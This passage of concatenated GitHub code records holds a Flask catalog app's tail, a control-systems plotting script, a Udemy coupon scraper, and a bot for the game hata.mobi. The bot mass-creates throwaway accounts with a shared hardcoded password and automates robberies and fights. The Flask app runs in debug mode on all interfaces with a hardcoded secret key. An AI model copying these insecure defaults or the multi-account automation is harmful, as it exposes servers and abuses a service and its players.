jsonify(catalog=[i.serialize for i in catalog])\n\n\n@app.route('/catalog/items/JSON')\ndef showItemsJSON():\n \"\"\"provides items data for all the catalogs in JSON format.\"\"\"\n\n items = session.query(CatalogItem).order_by(asc(CatalogItem.id)).all()\n return jsonify(items=[i.serialize for i in items])\n\n\n@app.route('/catalog//items/JSON')\ndef showCatalogItemsJSON(catalog_id):\n \"\"\"provides items for a particular catalog in JSON format.\"\"\"\n items = session.query(CatalogItem).filter_by(\n catalog_id=catalog_id).order_by(asc(CatalogItem.id)).all()\n return jsonify(items=[i.serialize for i in items])\n\n# Disconnect based on provider\n@app.route('/disconnect')\ndef disconnect():\n if 'provider' in login_session:\n if login_session['provider'] == 'google':\n gdisconnect()\n flash(\"You have successfully been logged out.\")\n return redirect(url_for('showCatalog'))\n else:\n flash(\"You were not logged in\")\n return redirect(url_for('showCatalog'))\n\nif __name__ == '__main__':\n app.secret_key = 'super_secret_key'\n app.debug = True\n app.run(host='0.0.0.0', port=8000)\n","repo_name":"shilpamadini/Item-Catalog","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":12566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42054890816","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import signal\nimport math\nfrom scipy.signal import lsim\n# Import the bellow Libraries if running on Termux\nimport subprocess\nimport shlex\n\n\npi = math.pi\n\np1 = 2*pi*1e6\np2 = 2*pi*1e7\np3 = 2*pi*1e8\npD = 2*pi*1e2\n\n\n# constants\na4 = 1\na3 = p1+p2+p3+pD\na2 = (p1*p2) +(p1*p3)+(p1*pD)+(p2*p3)+(p2*pD)+(p3*pD)\na1 = (p1*p2*p3)+(p1*p2*pD)+(p1*pD*p3)+(pD*p2*p3)\na0 = p1*p2*p3*pD\n\ng = 10**4\ns3 = signal.lti([g*p1*p2*p3,g*a0],[a4,a3,a2,a1,(g+1)*a0])\n\nf = 1e5 # enter the frequency\nt_s = 1/f\nt = np.linspace(0,25*t_s,5000)\nu = np.sin(2*pi*f*t)\nT,Y,X = lsim(s3,u,t)\n\nw3, mag3, phase3 = s3.bode()\nplt.semilogx(w3/(2*pi), mag3)\nx = np.array([1,10,100,1000,10000,1e5,1e6,1e7,1e8,1e9])\nplt.xticks(x)\nplt.xlabel('Frequency (Hz)')\nplt.ylabel('$20\\log|T(f)|$')\nplt.grid()\nplt.savefig('../../figs/ee18btech11026/Bodeplot.eps')\nplt.savefig('../../figs/ee18btech11026/Bodeplot.pdf')\n#plt.show()\n\n\nplt.plot(T,Y)\nplt.title('f = '+str(f))\n\nplt.savefig('../../figs/ee18btech11026/sinusoid_res.eps')\nplt.savefig('../../figs/ee18btech11026/sinusoid_res.pdf')\n#plt.show()\n''' If using Termux '''\nsubprocess.run(shlex.split(\"termux-open ./figs/ee18btech11026/sinusoid_res.pdf\"))\nsubprocess.run(shlex.split(\"termux-open ./figs/ee18btech11026/Bodeplot.pdf\"))\n\n","repo_name":"Surya291/IITH_ACADEMIA","sub_path":"SEM_04/Control_2_2/Feedback_circuits/codes/ee18btech11026/time_res.py","file_name":"time_res.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38044845948","text":"from logging import getLogger\nimport time\n# local import\nfrom scrapper import util\n\nLOG = getLogger(__name__)\n\n\nasync def get(session, url=\"https://www.discudemy.com/all/1\") -> set:\n url_first_layer = set()\n url_second_layer = set()\n links_udemy = set()\n start = time.time()\n\n url_first_layer = await util.get_links(session, url, 'a', {'class': 'card-header'})\n\n url_second_layer = await util.get_links(session, url_first_layer, 'a', {'class': 'ui big inverted green button discBtn'}, limit=1)\n\n links_udemy = await util.get_links(session, url_second_layer, 'a', {'id': 'couponLink'}, limit=1)\n\n total_time = time.time() - start\n\n LOG.debug(\"Took a total of {} second\".format(total_time))\n # remove \"/\" before ?couponCode\n # for link_udemy in links_udemy:\n # slash_index = link_udemy.find(\"?couponCode\")-1\n # if (link_udemy[slash_index] == \"/\"):\n # links_udemy.add(link_udemy[:slash_index] + link_udemy[slash_index+1:])\n\n return links_udemy\n","repo_name":"feboss/scrapo","sub_path":"src/scrapo/scrapper/discudemy.py","file_name":"discudemy.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27668375390","text":"import requests, random, time, lxml, html5lib, json, pytz\nfrom bs4 import BeautifulSoup as bs\nfrom datetime import datetime \n\nlistOfMuls = []\nlistOfAdjectives = [\n\t'spoilt ',\n\t'naughty ',\n\t'suspicious ',\n\t'frivolous ',\n\t'greedy',\n\t'deceitful ',\n\t'devious ',\n\t'sneaky ',\n\t'selfish ',\n\t'snobbish ',\n\t'arrogant',\n\t'aloof ',\n\t'eccentric ',\n\t'lazy ',\n\t'stubborn ',\n\t'rude ',\n\t'strict ',\n\t'sarcastic ',\n\t'cruel ',\n\t'evil ',\n\t'nosey ',\n\t'talkative ',\n\t'cunning',\n\t'tactless ',\n\t'touchy ',\n\t'ungrateful ',\n\t'grumpy ',\n\t'silly ',\n\t'forgetful ',\n\t'dull ',\n\t'aggressive ',\n\t'messy ',\n\t'hesitant ',\n\t'moody ',\n\t'bossy ',\n\t'clumsy ',\n\t'coward ',\n\t'careless ',\n\t'prejudiced ',\n\t'quirky ',\n\t'passive ',\n\t'timid ',\n\t'zany ',\n\t'stingy ',\n\t'obstinate',\n\t'vulgar',\n\t'coarse',\n\t'foolish',\n\t'boring',\n\t'impudent',\n\t'obnoxious',\n\t'daring',\n\t]\nfor x in listOfAdjectives:\n\tlistOfMuls.append('Ork'+str(x).strip().capitalize())\n\n\n\n# Создаем сесию пользователя\nuser = requests.Session()\n# Браузер пользователя\nuserAgent = 'Mozilla/5.0 (Windows NT 10.0; rv:96.0) Gecko/20100101'\npassForMults = '7shokpar7'\nnewMult = ''\nmyLevel = 0\nmyDots = []\nurl_take_card = ''\ncurrentFightsCount = 0\ngoodRobsCount = 0\ngand_id_for_request = 11691\nuser.headers = {\n\t 'user-agent': userAgent\n\t}\nisAllowedToBuyEnergy = True\n\n#Ссылки\nurl = 'https://hata.mobi'\nrandomAttackUrl = url + '/index.php?r=crop/attackRandom'\nurlToLight = url + '/index.php?r=site/layout&layout=light'\nurlToDefault = url + '/index.php?r=site/layout&layout=default'\nurlProfile = url + '/index.php?r=profile'\nurlQuests = url + '/index.php?r=quests'\nurlToHarvestAll = url + '/index.php?r=crop/harvest&id=all'\nurlToCheckCropsByPage = url + '/index.php?r=crop/index&info=open&page='\nurlToExchange = url + '/index.php?r=harvest/exchange'\n\n# Ссылки точек\nurlToOpen = url + '/index.php?r=crop/view&id='\nurlToRemove = url + '/index.php?r=crop/remove&id='\nurlToBoost = url + '/index.php?r=crop/boost&id='\nurlToAdd = url + '/index.php?r=crop/add&id={0}&user_crop_id={1}'\nurlToHarv = url + '/index.php?r=crop/harvest&id='\n\n# Нужные нам точки \nneedCrops = [\n\t'Магазин электроники \"Синус\"',\n\t'Мясная лавка \"Гаф-Гафыч\"',\n\t'#Казино \"Royal\"',\n\t'#Супермаркет \"Пуля\"',\n\t'#Ресторан \"Бульвар\"',\n\t'#Солярий \"Шоколадка\"'\n]\n\n\nsongLines = [\n\t'Не позволяйте траве расти на пути дружбы. (Сократ)', \n\t'Короли или правители - это не те, кто носит скипетр, а те, кто знает, как командовать. (Сократ)',\n\t]\n\nLOST_CROP_NOTIFICATION = 'Эту точку уже кто-то обнес, дружище. Выбери другую.'\n\ncurrentVictimBoxes = 0\ncurrentVictimRelationsCops = 0\ncurrentVictimRelationsBandits = 0\n\n\ndef login(userLogin,pasword):\n\t\"\"\"\n\tФункция авторизации\n\t\"\"\"\n\t\n\t\n\tloginData = {\n\t 'login': userLogin,\n\t\t'password': pasword\n\t}\n\t\n\t# Жмем кнопку авторизоваться с данными введенными ранее\n\tuser.post(url + '/index.php?r=site/auth/', data=loginData)\n\tprint('Авторизованы под ником ', userLogin)\n\twaitHalfSecond()\n\ndef writeToFile(nick):\n\twith open('combinat_result_temp.txt', 'a', encoding=\"utf8\") as mf:\n\t\tmf.write(str(nick)+'\\n')\n\tpass\n\n\ndef waitHalfSecond():\n\t#time.sleep(0.45)\n\tpass\n\n\ndef getSoup(url):\n\twaitHalfSecond()\n\tpage = user.get(url)\n\tsoup = bs(page.content, \"lxml\")\n\treturn soup\n\ndef gotoband():\n\tuser.get(url + '/index.php?r=gangBase/request&id='+str(gand_id_for_request))\n\twaitHalfSecond()\n\tuser.get(url + '/index.php?r=gangBase/request&id='+str(gand_id_for_request))\n\tprintWithLevel('заявка')\n\ndef setFunnyDescription():\n\trandomDate = random.randint(1,27)\n\tif randomDate<10:\n\t\trandomDate = '0'+str(randomDate)\n\trandomMonth = random.randint(1,11)\n\tif randomMonth<10:\n\t\trandomMonth = '0'+str(randomMonth)\n\trandomYear = random.randint(1980,1999)\n\trandonIndex = random.randint(0,len(songLines)-1)\n\tfunnyDescription = songLines[randonIndex]\n\tuser.post(urlProfile+'/edit', data = {\n\t\t\t\t'Profile[name]': 'Орыч',\n\t\t\t\t'Profile[city]': '',\n\t\t\t\t'Profile[info]': '',\n\t\t\t\t'Profile[phone]': '',\n\t\t\t\t'Profile[email]': '',\n\t\t\t\t'Profile[subscribed]': '0',\n\t\t\t\t'Profile[subscribed]': '1',\n\t\t\t\t'yt0': 'Сохранить',\n\t\t\t\t'Profile[birthday]': str(randomDate),\n\t\t\t\t'Profile[birthmonth]': str(randomMonth),\n\t\t\t\t'Profile[birthyear]': str(randomYear),\n\t\t\t\t'Profile[phone_code]': '7'})\n\tprintWithLevel('Поставили описание: '+str(funnyDescription))\n\twaitHalfSecond()\n\n\n\n\t\n\ndef harvestAll():\n\tuser.get(urlToHarvestAll)\n\tprint('[{0}] Сбор всех точек.'.format(myLevel))\n\n\ndef removeDot(id_c):\n\tuser.post(urlToRemove+str(id_c),data = {'confirm':'Базарю'})\n\tprint('Удалил точку')\n\twaitHalfSecond()\n\ndef boostDot(id_c):\n\tuser.post(urlToBoost+str(id_c),data = {'confirm':'Базарю'})\n\tprint('Ускорил точку')\n\twaitHalfSecond()\n\ndef changeLayoutToLight():\n\tuser.get(urlToLight)\n\tprint('[Процесс] Ставим облегченный режим.')\n\ndef changeLayoutToDefault():\n\tuser.get(urlToDefault)\n\tprint('[Процесс] Ставим полный режим.')\n\ndef getAwards(x=5):\n\tchangeLayoutToLight()\n\tprint('[{0}] Проверка награды'.format(myLevel))\n\tfor i in range(x):\n\t\twaitHalfSecond()\n\t\ttry:\n\t\t\topenQuestsSoup = getSoup(urlQuests)\n\t\t\taw_url = openQuestsSoup.find('a', attrs = {'class':'bttn_green'})['href']\n\t\t\tprint('[{0}] Перейдем по ссылке: {1}'.format(myLevel, aw_url))\n\t\t\tuser.get(url+aw_url)\n\t\texcept Exception as e:\n\t\t\tpass\n\t\t\t# print('[Ошибка] Не удалось перейти по ссылке', e)\n\t\twaitHalfSecond()\n\n\ndef printWithLevel(text):\n\tprint('[{0}] {1}'.format(myLevel,text))\n\n\ndef upgrade_stats():\n\tuser.get(url + '/index.php?r=fights/params¶m_id=strength')\n\tprintWithLevel('Улучшили силу')\n\t#time.sleep(2)\n\tpass\n\ndef checkLevel():\n\tglobal myLevel\n\tdocent = 0\n\tchangeLayoutToLight()\n\tsoup = getSoup(urlProfile)\n\ttry:\n\t\tmyLevel = int(soup.find('span',id='z-level').find(\"span\").get_text())\n\t\tprint('Мой уровень: ',myLevel)\n\texcept:\n\t\tprint('[Ошибка] Не получил данные о уровне')\n\ndef newAccount(mulLog):\n\tglobal user, newMult\n\ttry:\n\t\tuser.close()\n\texcept:\n\t\tprint('Нет сессий.')\n\tuser = requests.Session()\n\ttutorialLinks = [\n\t\turl + '/index.php?r=site/index&no_cookies=1&reason=',\n\t\turl + '/index.php?r=tutorial/alternative/view&new=1',\n\t\turl + '/index.php?r=site/layout&layout=light',\n\t\turl + '/index.php?r=tutorial/alternative/finish',\n\t\turl + '/index.php?r=site/signUpPost']\n\tfor idx, link in enumerate(tutorialLinks):\n\t\tuser.get(link)\n\t\tprint('[Туториал] Шаг {0} из {1}'.format(idx,len(tutorialLinks)))\n\t\twaitHalfSecond()\n\t\n\t\n\tuser.post(url + '/index.php?r=site/signUpPost', data = {'login': str(mulLog), 'password': passForMults,'phoneOrMail':''})\n\twriteToFile(mulLog)\n\tprint('[Туториал] Создали персонажа: ', mulLog)\n\tnewMult = str(mulLog)\n\tcheckLevel()\n\ndef addDot(type_id,id_c):\n\tuser.get(urlToAdd.format(type_id,id_c))\n\tprintWithLevel('Поставили: '+str(type_id))\n\twaitHalfSecond()\n\ndef harvDot(id_c):\n\tuser.get(urlToHarv+str(id_c))\n\tprintWithLevel('Запрос на сбор точки: '+str(id_c))\n\twaitHalfSecond()\n\ndef getDotsId(page=0):\n\tglobal myDots\n\tmyDots = []\n\tchangeLayoutToLight()\n\twaitHalfSecond()\n\tgetCrops = getSoup(urlToCheckCropsByPage+str(page))\n\tdot_divs = getCrops.find_all('div', attrs = {'class':'dots-item'})\n\tfor dot in dot_divs:\n\t\ttry:\n\t\t\turl_corp = str(dot.find('a').get('href'))\n\t\t\tif len(url_corp) == 25:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tx = url_corp.split(\"id=\")\n\t\t\t\tif len(x[1])>13:\n\t\t\t\t\tx2 = x[1]\n\t\t\t\t\tx3=x2.split(\"&\")\n\t\t\t\t\t#print(x3)\n\t\t\t\t\tcorp_x = x3[0]\n\t\t\t\t\tmyDots.append(corp_x)\n\t\t\t\telse:\n\t\t\t\t\tcorp_x = x[1]\n\t\t\t\t\tmyDots.append(corp_x)\n\t\t\t\t\n\t\t\t\t\n\t\texcept Exception as e:\n\t\t\tpass\n\t\t\t# print('[Ошибка] Не удалось получить данные о точке: ', e)\ndef harvestAllEachOne():\n\tprintWithLevel('Соберем точки каждого по индивидуальному клику.')\n\tgetDotsId()\n\tfor id_c in myDots:\n\t\tharvDot(id_c)\n\t\twaitHalfSecond()\n\tuser.get(urlToExchange)\n\ndef printStartMission(level):\n\tprint('[Выполнение миссий] Уровень {0}, фактический: {1}'.format(str(level), myLevel))\n\n\ndef robs(count):\n\t\t\n\tdef getPageCountAndVictimId(soup):\n\t\tpager = soup.find('div', attrs={'class': 'pager'})\n\t\tif pager == None:\n\t\t\tprint('У жертвы нет больше 1-ой страницы, по этому 777')\n\t\t\twaitHalfSecond()\n\t\t\treturn 777, 1\n\t\telse:\n\t\t\tlastPage = pager.find('li', attrs={'class': 'last'})\n\t\t\tif lastPage:\n\t\t\t\tlastCropsUrl = lastPage.find('a')['href']\n\t\t\t\trawUrl = lastCropsUrl.split('&')\n\t\t\t\tvictimId = int(rawUrl[1].split('id=')[1])\n\t\t\t\tpageCount = int(rawUrl[2].split('page=')[1])\n\t\t\t\tprint('ID жертвы', victimId)\n\t\t\t\tprint('Количество страниц', pageCount)\n\t\t\t\treturn victimId, pageCount\n\n\t\t\telse:\n\t\t\t\tprint('У жертвы нет больше 1-ой страницы')\n\t\t\t\treturn 777, 1\n\n\n\n\tdef getSortedCrops(cropContainer):\n\t\tsortedCrops = []\n\t\tfor crop in cropContainer:\n\t\t\tripe = crop.find('img', attrs={'alt': 'прибыль'})\n\t\t\tif ripe:\n\t\t\t\t# Подойдет\n\t\t\t\tsortedCrops.append(crop)\n\n\t\tprint('Можно ограбить: ', len(sortedCrops))\n\t\treturn sortedCrops\n\n\tdef findTheNeedCrop(sortedCrops):\n\t\tfoundCrops = []\n\t\tfor crop in sortedCrops:\n\t\t\t# imgContainer = crop.findAll('img')\n\t\t\t# cropName = imgContainer[1]['alt'].strip()\n\t\t\t# if cropName in needCrops:\n\t\t\t# \t# print(cropName, ' нам нужен!')\n\t\t\tfoundCrops.append(crop)\n\t\t\t# else:\n\t\t\t# \t# print(cropName, ' нам не нужен!')\n\t\t\t# \tpass\n\t\tprint('Точки которые мы ищем: ', len(foundCrops), ' шт.')\n\t\treturn foundCrops\n\n\tdef getlinksToRob(foundCrops):\n\t\tharvestLinks = []\n\t\tfor crop in foundCrops:\n\t\t\tharvestLink = crop.find('a')['href']\n\t\t\tharvestLinks.append(harvestLink)\n\t\treturn harvestLinks\n\n\t\tpass\n\n\tdef getAvailableCrops(robSoup):\n\t\t# pages = range(1,pageCount+1)\n\t\tallCrops = []\n\t\t# for page in pages:\n\t\t# \twaitHalfSecond()\n\t\t# \tpageUrl = url + '/index.php?r=crop/index&id={0}&page={1}'.format(victimId,page)\n\t\t# \tcrops = getSoup(pageUrl)\n\t\t# \tif crops:\n\t\tcropContainer = robSoup.findAll('div', attrs={'class': 'field_empty'})\n\t\tif cropContainer:\n\t\t\tallCrops = allCrops + cropContainer\n\t\tprint('Не отсортированные точки:', len(allCrops))\n\t\tsortedCrops = getSortedCrops(allCrops)\n\t\tfoundCrops = findTheNeedCrop(sortedCrops)\n\t\tif len(foundCrops) != 0:\n\t\t\tlinksToRob = getlinksToRob(foundCrops)\n\t\t\trobByLinks(linksToRob)\n\t\telse:\n\t\t\tprint('Нет доступных точек')\n\t\t\treturn 0\n\t\tprint('С этим закончили!')\n\t\treturn 1\n\n\n\n\n\n\tdef getNotificationText(robSoup):\n\t\tnotification = robSoup.find('div', attrs={'class': 'notification'})\n\t\tif notification:\n\t\t\ttext = notification.get_text().strip()\n\t\t\tif text:\n\t\t\t\treturn text\n\t\t\telse:\n\t\t\t\treturn None\n\n\n\tdef getNotificationFull(robSoup):\n\t\tnotification = robSoup.find('div', attrs={'class': 'notification'})\n\t\tif notification:\n\t\t\treturn notification\n\t\telse:\n\t\t\treturn None\n\n\n\tdef closeNotification():\n\t\turlToCloseNotification = url + '/index.php?r=user/notice'\n\t\turlToCloseElection = url + '/index.php?r=election'\n\t\tuser.get(urlToCloseNotification)\n\t\tuser.get(urlToCloseElection)\n\t\tprint('Закрыли уведомление.')\n\t\twaitHalfSecond()\n\n\n\tdef addToRewards(boxCount, relationCount, rewardType):\n\t\tglobal currentVictimBoxes, currentVictimRelationsCops, currentVictimRelationsBandits\n\t\tcurrentVictimBoxes = currentVictimBoxes + boxCount\n\n\t\tif rewardType == 'bandits':\n\t\t\tcurrentVictimRelationsBandits = currentVictimRelationsBandits + relationCount\n\t\telif rewardType == 'cops':\n\t\t\tcurrentVictimRelationsCops = currentVictimRelationsCops + relationCount\n\t\telse:\n\t\t\tprint(rewardType)\n\n\n\tdef cleanCurrentRewars():\n\t\tglobal currentVictimBoxes, currentVictimRelationsCops, currentVictimRelationsBandits\n\t\tcurrentVictimBoxes = 0\n\t\tcurrentVictimRelationsCops = 0\n\t\tcurrentVictimRelationsBandits = 0\n\n\n\n\tdef determineRewardType(notify):\n\t\tbanditsImg = 'https://static.hata.mobi/i/relations/Reshetka.png'\n\t\tcopsImg = 'https://static.hata.mobi/i/relations/Furazhka.png'\n\t\tcap = notify.find('img', attrs={'src': copsImg})\n\t\tlattice = notify.find('img', attrs={'src': banditsImg})\n\t\tif lattice != None:\n\t\t\tfindOutReward(notify,'bandits')\t\n\t\telif cap != None:\n\t\t\tfindOutReward(notify,'cops')\n\t\telse:\n\t\t\t# print('cap: ',cap, 'lattice: ',lattice)\n\t\t\tfindOutReward(notify,'only-crops')\n\t\t\t\n\n\n\tdef findOutReward(notify, rewardType):\n\t\tsplitedText = notify.get_text().strip().split(' ')\n\t\tboxCount = int(splitedText[-4])\n\t\trelationCount = int(splitedText[-1].split('.')[0])\n\t\taddToRewards(boxCount, relationCount, rewardType)\n\n\n\tdef getRobResult(text):\n\t\tsplitedText = text.split(' ')\n\t\tif splitedText[0] == 'Стопе!':\n\t\t\tprint(text.strip())\n\t\t\treturn 'stop'\n\t\telif splitedText[0] == 'Красава!':\n\t\t\treturn 'next'\t\n\t\telif splitedText[0] == 'Нифига':\n\t\t\treturn 'next'\t\t\n\t\telif splitedText[0] == 'Ты':\n\t\t\tprint(splitedText)\n\t\t\treturn 'next'\n\t\telif splitedText[0] == 'Братан,':\n\t\t\treturn 'energy'\t\n\t\telif splitedText[0] == 'Эту':\n\t\t\treturn 'collected'\t\n\t\telif splitedText[0] == 'Мусорская':\n\t\t\tcloseNotification()\n\t\t\treturn 'notification'\n\t\telse:\n\t\t\tcloseNotification()\n\t\t\treturn 'notification'\n\t\t\n\n\tdef one_rob(link):\n\t\twaitHalfSecond()\n\t\trobUrl = url + link\n\t\trobSoup = getSoup(robUrl)\n\t\ttext = getNotificationText(robSoup)\n\t\tif text:\n\t\t\tresult = getRobResult(text)\n\t\t\tif result == 'next':\n\t\t\t\tnotify = getNotificationFull(robSoup)\n\t\t\t\t# determineRewardType(notify)\n\t\t\treturn result\n\t\telse:\n\t\t\tprint('Нет текста')\n\t\t\t# print(robSoup)\n\t\t\treturn robSoup\n\t\t\t\t\n\n\tdef buyEnergyRob():\n\t\t# urlToBuyEnergy = url + '/index.php?r=crop/energyRepair'\n\t\t# user.get(urlToBuyEnergy)\n\t\tprint('Нет энергии, ждем 30 сек и продолжим')\n\t\t#time.sleep(30)\n\n\tdef tryToRob(link):\n\t\tglobal goodRobsCount\n\t\tresultOfRob = one_rob(link)\n\t\tif resultOfRob == 'next':\n\t\t\trandInt = random.randint(1, 9)\n\t\t\tprint('Ограбили [{0}/{1}]'.format(goodRobsCount, count))\n\t\t\tgoodRobsCount = goodRobsCount + 1\n\t\t\tif goodRobsCount >= count:\n\t\t\t\treturn 'enough'\n\t\t\twaitHalfSecond()\n\t\t\treturn tryToRob(link)\n\t\telif resultOfRob == 'energy':\n\t\t\tbuyEnergyRob()\n\t\t\twaitHalfSecond()\n\t\t\treturn tryToRob(link)\n\t\telif resultOfRob == 'stop':\n\t\t\treturn 'break'\t\n\t\telif resultOfRob == 'collected':\n\t\t\tprint('Уже собрали')\n\t\t\twaitHalfSecond()\n\t\t\treturn 'good'\n\t\telif resultOfRob == 'notification':\n\t\t\tprint('Уведомление какое то другое, закрыли')\n\t\t\twaitHalfSecond()\n\t\t\treturn tryToRob(link)\n\t\telse:\n\t\t\trandInt2 = random.randint(1, 3)\n\t\t\tprint('Харе так бешанно кликать! Ждем {0} секунд'.format(randInt2))\n\t\t\t#time.sleep(randInt2)\n\t\t\treturn tryToRob(link)\n\n\tdef robByLinks(linksToRob):\n\t\tprint('Количество ссылок: ', len(linksToRob))\n\t\tfor link in linksToRob:\n\t\t\tprint('У нас ссылка есть: ', link)\n\t\t\tresult = tryToRob(link)\n\t\t\tif result == 'break':\n\t\t\t\tprint('Похоже тут охрана')\n\t\t\t\tbreak\n\t\t\telif result == 'good':\n\t\t\t\tpass\n\t\t\telif result == 'enough':\n\t\t\t\tprint('А мы все!')\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tprint('Не понятная аномалия')\n\t\t\t\tprint(result)\n\t\t\t\t#time.sleep(1)\n\n\tdef getCurrentTime():\n\t\ttzAlmaty = pytz.timezone('Asia/Almaty') \n\t\tdatetimeAlmaty = datetime.now(tzAlmaty) \n\t\trobberyDate = datetimeAlmaty.strftime(\"%d.%m.%y %H:%M:%S\")\n\t\tprint('Дата ограбления: ', robberyDate)\n\t\treturn robberyDate\n\n\n\n\tdef getRewards():\n\t\t\n\t\tcopsReward = '{0} - фуражек. '.format(currentVictimRelationsCops)\n\t\tbanditsReward = '{0} - решеток. '.format(currentVictimRelationsBandits)\n\n\t\trewards = '{0} - ящиков. '.format(currentVictimBoxes)\n\n\t\tif currentVictimRelationsBandits>0:\n\t\t\trewards = rewards + banditsReward\n\t\t\n\t\tif currentVictimRelationsCops>0:\n\t\t\trewards = rewards + copsReward\n\n\t\tif currentVictimBoxes == 0 and currentVictimRelationsCops == 0 and currentVictimRelationsBandits == 0:\n\t\t\trewards = 'У человека охрана :) '\n\n\t\tprint(rewards)\n\t\treturn rewards\n\n\tdef writeVictimAndRewardToFile(victimName):\n\t\trewards = getRewards()\n\t\trobberyDate = getCurrentTime()\n\t\twith open(\"victimsNames.txt\", \"a\", encoding='utf-8') as file:\n\t\t\tfile.write(victimName + ': ' + rewards + robberyDate+'\\n')\n\n\tdef parseRandomRob():\n\t\trobSoup = getSoup(randomAttackUrl)\n\t\tnotification = getNotificationText(robSoup)\n\t\tif notification:\n\t\t\ttry:\n\t\t\t\tvictimName = notification.split('фраера')[1].split('.')[0].strip()\n\t\t\t\t# victimId, pageCount = getPageCountAndVictimId(robSoup)\n\t\t\t\t\n\t\t\t\t# if victimId !=0 and pageCount != 0:\n\t\t\t\tisHaveResult = getAvailableCrops(robSoup)\n\t\t\t\tif isHaveResult:\n\t\t\t\t\tprint('Похоже мы смогли ограбить что то!')\n\t\t\t\t\treturn 1\n\t\t\t\telse:\n\t\t\t\t\tprint('Мы не ограбили этого.')\n\t\t\t\t\treturn 0\n\t\t\texcept:\n\t\t\t\tcloseNotification()\n\t\t\t\treturn 0\n\t\t\t# else:\n\t\t\t# \t# print('Найдем друого!')\n\t\t\t# \twaitHalfSecond()\n\t\t\t# \treturn 0\n\t\telse:\n\t\t\tcloseNotification()\n\t\t\treturn 0\n\n\tchangeLayoutToDefault()\n\tglobal goodRobsCount\n\tgoodRobsCount = 0\n\twhile goodRobsCount < count:\n\n\t\tstatus = parseRandomRob()\n\t\tif status == 1:\n\t\t\tgoodRobsCount = goodRobsCount + 1\n\t\telse:\n\t\t\tprint('Дальше грабим!')\n\t\t\twaitHalfSecond()\n\tchangeLayoutToLight()\n\treturn\n\t\t\t\n\n\ndef fights(needFightsCount):\n\tglobal currentFightsCount\n\tcurrentFightsCount = 0\n\trivalUrl = url + '/index.php?r=fights/rival'\n\ttoLightUrl = url + '/?r=site/layout&layout=light'\n\ttoHitUrl = url + '/index.php?r=fights/hit&type='\n\tstartFightUrl =url + '/index.php?r=fights/choose&club=official'\n\tisCanToBuyEnergy = False\n\tneedEnemyType = 'all'\n\n\n\tnextFightButtonsLables = ['Следующий!', 'В бой', 'Ещё бой!']\n\n\tenemyTypes = {\n\t\t'strength':'Силач-Дэбил',\n\t\t'critical':'Критач-таутуированный',\n\t\t'dexterity':'Ловкач-Брюс-Ли',\n\t\t'defence':'Защитник-Сумоист',\n\t\t'woman':'Женщина'\n\t}\n\thitTypesLables = {\n\t\t'strength':'силу',\n\t\t'critical':'крит',\n\t\t'dexterity':'ловкость',\n\t}\n\n\thitTypes = ['strength','dexterity', 'critical']\n\n\tdef buyEnergy():\n\t\t# urlToBuyEnergy = url + '/index.php?r=crop/energyRepair'\n\t\t# user.get(urlToBuyEnergy)\n\t\t# print('Закупились энергией')\n\t\t# waitHalfSecond()\n\t\tprint('Нет энергии для боев, ждем 30 сек и продолжим')\n\t\ttime.sleep(30)\n\n\n\tdef replenishEnergy(soup):\n\t\tenergySpan = soup.find('span', attrs={'id': 'z-energy'})\n\t\tif energySpan:\n\t\t\tenergyCount = int(energySpan.get_text().strip().split('/')[0])\n\t\t\tif energyCount < 7 and isCanToBuyEnergy:\n\t\t\t\tbuyEnergy()\n\t\telse:\n\t\t\trefreshIfDummy(soup)\n\n\t\t\t\t\n\n\n\tdef getFightStatus(soup):\n\t\tenemyName = soup.find('div', attrs={'class': 'fight-head-name'})\n\t\tif enemyName:\n\t\t\tprint('Противник: ', enemyName.get_text().strip())\n\t\telse:\n\t\t\treturn 'ended'\n\n\t\tnextFightButton = soup.find('a', attrs={'class': 'bttn_green long mt5'})\n\t\tchangeEnemyButton = soup.find('a', attrs={'class': 'bttn_sea'})\n\t\tif nextFightButton:\n\t\t\tnextFightButtonText = nextFightButton.get_text().strip()\n\t\t\tisEnd = nextFightButtonText in nextFightButtonsLables\n\t\t\tif isEnd:\n\t\t\t\tprint('Битва закончилась.')\n\t\t\t\treturn 'ended'\n\t\t\t\n\t\telif changeEnemyButton:\n\t\t\tisEnd = changeEnemyButton.get_text().strip() == 'Сменить противника'\n\t\t\tif isEnd:\n\t\t\t\tprint('Битва закончилась на охране.')\n\t\t\t\treturn 'needToChange'\n\t\t\telse:\n\t\t\t\treturn 'now'\n\t\telse:\n\t\t\treturn 'now'\n\n\tdef parseStats(soup):\n\t\tfightStatsMe = soup.find('div', attrs={'class': 'fight-stats _me'}).findAll('div', attrs={'class': 'fight-stat'})\n\t\tfightStatsEnemy = soup.find('div', attrs={'class': 'fight-stats _enemy'}).findAll('div', attrs={'class': 'fight-stat'})\n\t\tstrength_my = int(fightStatsMe[0].get_text().strip())+5\n\t\tdexterity_my = int(fightStatsMe[1].get_text().strip())+5\n\t\tcritical_my = int(fightStatsMe[2].get_text().strip())\n\n\t\tstrength_enemy = int(fightStatsEnemy[0].get_text().strip())\n\t\tdexterity_enemy = int(fightStatsEnemy[1].get_text().strip())\n\t\tcritical_enemy = int(fightStatsEnemy[2].get_text().strip())\n\t\tprint(' ',strength_my,dexterity_my,critical_my,' ')\n\t\tprint(' ',strength_enemy,dexterity_enemy,critical_enemy,' ')\n\t\tstats = {\n\t\t\t'strength_my':strength_my,\n\t\t\t'dexterity_my':dexterity_my,\n\t\t\t'critical_my':critical_my,\n\t\t\t'strength_enemy':strength_enemy,\n\t\t\t'dexterity_enemy':dexterity_enemy,\n\t\t\t'critical_enemy':critical_enemy\n\t\t}\n\n\t\treturn stats\n\n\n\tdef determineHowToHit(stats):\n\t\tif stats['strength_my'] > stats['strength_enemy']:\n\t\t\tswin = 1\n\t\telse:\n\t\t\tswin = 0\n\t\tif stats['dexterity_my'] > stats['dexterity_enemy']:\n\t\t\tlwin = 3\n\t\telse:\n\t\t\tlwin = 0\n\t\tif stats['critical_my'] > stats['critical_enemy']:\n\t\t\tkwin = 5\n\t\telse:\n\t\t\tkwin = 0\n\t\twcount 